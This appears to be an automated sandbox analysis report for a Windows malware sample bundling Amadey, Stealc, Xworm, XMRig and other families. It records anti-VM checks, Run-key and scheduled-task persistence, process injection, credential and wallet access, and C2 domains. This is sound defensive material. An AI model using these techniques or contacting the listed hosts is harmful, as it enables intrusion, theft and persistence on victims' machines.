Analysis Overview
SHA256
001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066
Threat Level: Known bad
The file 001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066 was found to be: Known bad.
Malicious Activity Summary
xmrig
SystemBC
Stealc family
Stealc
Amadey
GCleaner
Detect Xworm Payload
Healer family
Healer
Xmrig family
Systembc family
Xworm
Detects Healer an antivirus disabler dropper
Xworm family
Gcleaner family
Amadey family
Identifies VirtualBox via ACPI registry values (likely anti-VM)
XMRig Miner payload
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Uses browser remote debugging
Checks BIOS information in registry
Reads user/profile data of local email clients
Checks computer location settings
Executes dropped EXE
Reads user/profile data of web browsers
Identifies Wine through registry keys
Drops startup file
Loads dropped DLL
Adds Run key to start application
Checks installed software on the system
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
AutoIT Executable
Enumerates processes with tasklist
Suspicious use of SetThreadContext
Drops file in Windows directory
Program crash
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Unsigned PE
Browser Information Discovery
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Delays execution with timeout.exe
Kills process with taskkill
Scheduled Task/Job: Scheduled Task
Suspicious use of WriteProcessMemory
Checks processor information in registry
Suspicious use of FindShellTrayWindow
Modifies registry class
Suspicious use of UnmapMainImage
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2025-03-05 22:36
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2025-03-05 22:36
Reported
2025-03-05 22:38
Platform
win7-20240903-en
Max time kernel
120s
Max time network
120s
Command Line
Signatures
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Browser Information Discovery
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2208 wrote to memory of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2208 wrote to memory of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2208 wrote to memory of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | C:\Windows\SysWOW64\WerFault.exe |
| PID 2208 wrote to memory of 2696 | N/A | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | C:\Windows\SysWOW64\WerFault.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe
"C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2208 -s 1212
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | circujitstorm.bet | udp |
| US | 8.8.8.8:53 | explorebieology.run | udp |
| US | 8.8.8.8:53 | gadgethgfub.icu | udp |
| US | 8.8.8.8:53 | moderzysics.top | udp |
| US | 172.67.189.66:443 | moderzysics.top | tcp |
Files
memory/2208-0-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-1-0x00000000773B0000-0x00000000773B2000-memory.dmp
memory/2208-2-0x00000000000E1000-0x0000000000141000-memory.dmp
memory/2208-3-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-4-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-5-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-6-0x00000000000E0000-0x00000000003EF000-memory.dmp
memory/2208-7-0x00000000000E1000-0x0000000000141000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2025-03-05 22:36
Reported
2025-03-05 22:38
Platform
win10v2004-20250217-en
Max time kernel
127s
Max time network
152s
Command Line
Signatures
Amadey
Amadey family
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Healer an antivirus disabler dropper
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
GCleaner
Gcleaner family
Healer
Healer family
Stealc
Stealc family
SystemBC
Systembc family
Xmrig family
Xworm
Xworm family
xmrig
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Uses browser remote debugging
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10106760101\PcAIvJ0.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\dll32.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\win_update.vbs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\ProgramData\nxpsp\mcsq.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107410101\31107e887f.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\TempMYLRQMYGX7EXEVV78TDKUAFSWC4JLZP2.EXE | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107490101\339a55ae62.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\10107510101\5e644351a1.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\RBCRUM6KVZ7YTYUB9QJUZBNP2C3075.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\Software\Wine | C:\Users\Admin\AppData\Local\Temp\001a85285afa647fe211081b973e009d565f8d11c6826bc563d870e8a1d7f066.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dll32.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\AdminUserCash\tempdatalogger.exe | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\83c5f6f0d5.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107500101\\83c5f6f0d5.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\5e644351a1.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107510101\\5e644351a1.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8c305bd773.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107520101\\8c305bd773.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1874072718-2205492803-118941907-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3277ecaa2a.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\3277ecaa2a.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
Checks installed software on the system
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3432 set thread context of 1940 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 1584 set thread context of 1588 | N/A | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe |
| PID 4596 set thread context of 1036 | N/A | C:\Users\Admin\AppData\Local\Temp\10107460101\09a5b3d3db.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 4372 set thread context of 1456 | N/A | C:\Users\Admin\AppData\Local\Temp\10107480101\b945d3c333.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\J4N7D1D1SFJ8ZZ0MYXJD3P3ZAVUIW9.exe | N/A |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000760100\vertualiziren.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\10107470101\c03b939485.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107500101\83c5f6f0d5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107530101\b26b6bfdcd.exe | N/A |
